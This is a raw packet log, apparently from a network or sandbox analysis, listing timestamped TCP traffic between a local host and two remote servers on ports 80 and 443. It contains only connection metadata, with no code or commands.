                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.017710924 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.018381119 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.018564939 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.018692970 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.019450903 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.019567013 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.020159006 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.020263910 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.020301104 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.020385027 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.021092892 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.021265984 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.022001982 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.022015095 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.022141933 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.022697926 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.022974014 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.023108006 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.023235083 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.023909092 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.024117947 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.024646997 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.024699926 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.024811983 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.024863958 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.025597095 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.025650024 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.026456118 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.026464939 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.026539087 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.027343035 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.027389050 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.027432919 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.027477980 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.028215885 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.028350115 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.029099941 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.029141903 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.029239893 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.029282093 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.030000925 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.030131102 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.030396938 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.030884027 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.031009912 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.031768084 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.031829119 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.031908989 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.031960964 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.032682896 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.032835960 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.033399105 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.033554077 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.107976913 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.118056059 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.118139982 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.118166924 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.123212099 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.136338949 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.136421919 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.136428118 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.137979984 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.158175945 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.158261061 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.158267975 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.158301115 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.166325092 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.166467905 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.166538954 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.166539907 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.166789055 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.167610884 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.167661905 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.168009996 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.168055058 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.168394089 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.168553114 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.169284105 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.169325113 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.169544935 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.169589996 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.170155048 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.170279026 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.170327902 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.171051025 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.171246052 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.171925068 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.171968937 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.172070026 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.172111988 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.172816992 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.172976017 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.173626900 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.173688889 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.173690081 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.173697948 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.173732042 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.174000978 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.174014091 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.174066067 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.174612045 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.187794924 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.187879086 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.187942028 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.188143969 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.188185930 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.188344955 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.188494921 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.189158916 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.189220905 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.189223051 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.189229965 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.189265966 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.189367056 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.189380884 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.189424038 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.190130949 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.190306902 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.190356970 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.191225052 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.191363096 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.191940069 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.191986084 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.192110062 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.192156076 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.192811966 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.192977905 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.193711996 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.193761110 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.193845034 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.193887949 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.194588900 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.194870949 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.194917917 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.195519924 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.195683002 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.196394920 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.196439028 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.196557999 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.196599007 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.197249889 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.197423935 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.198168993 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.198173046 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.198303938 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.199096918 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.199141979 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.199227095 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.199268103 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.199947119 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.200207949 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.200968027 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.201019049 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.201061964 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.201107025 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.201755047 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.201903105 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.202049971 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.202718019 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.202914953 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.203527927 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.203571081 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.203645945 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.203691959 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.204586983 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.205092907 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.205144882 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.205307961 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.205548048 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.206253052 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.206259012 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.206413031 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.207108021 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.207151890 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.207253933 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.207298040 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.207992077 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.208151102 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.208957911 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.208976984 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.209321022 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.209745884 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.209814072 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.209815979 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.209822893 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.209862947 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.210024118 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.210331917 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.210375071 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.210762978 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.210947990 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.211651087 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.211692095 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.211750984 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.211786032 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.212486982 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.212618113 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.213597059 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.213643074 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.213716984 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.213752985 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.214580059 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.214720011 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.214764118 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.215368986 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.215626955 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.215672970 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.216284990 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.216379881 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.216660976 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.217089891 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.217253923 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.217542887 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.217842102 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.217978001 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.218542099 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.218786955 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.218889952 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.218926907 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.219604969 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.219789982 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.220196962 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.220597982 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.220851898 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.220973969 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.221467018 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.221561909 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.221601963 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.222321033 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.222462893 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.222503901 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.223179102 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.223351002 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.223392963 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.224131107 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.224270105 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.224317074 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.225192070 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.225248098 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.225307941 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.225318909 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.225665092 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.225714922 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.225734949 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.240617990 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.240683079 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.240691900 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.240767002 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.274382114 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.274391890 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.274694920 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.274699926 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.311992884 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.312066078 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.312086105 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.312163115 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.324034929 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.324112892 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.324124098 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.326056957 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.338366032 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.338454962 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.338464975 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.341984987 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.348459959 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.348527908 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.348534107 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.350703955 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.358268976 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.358338118 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.358345985 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.358594894 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.358767986 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.358833075 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.358833075 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.359005928 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.359273911 CET8049802139.99.188.124192.168.2.6
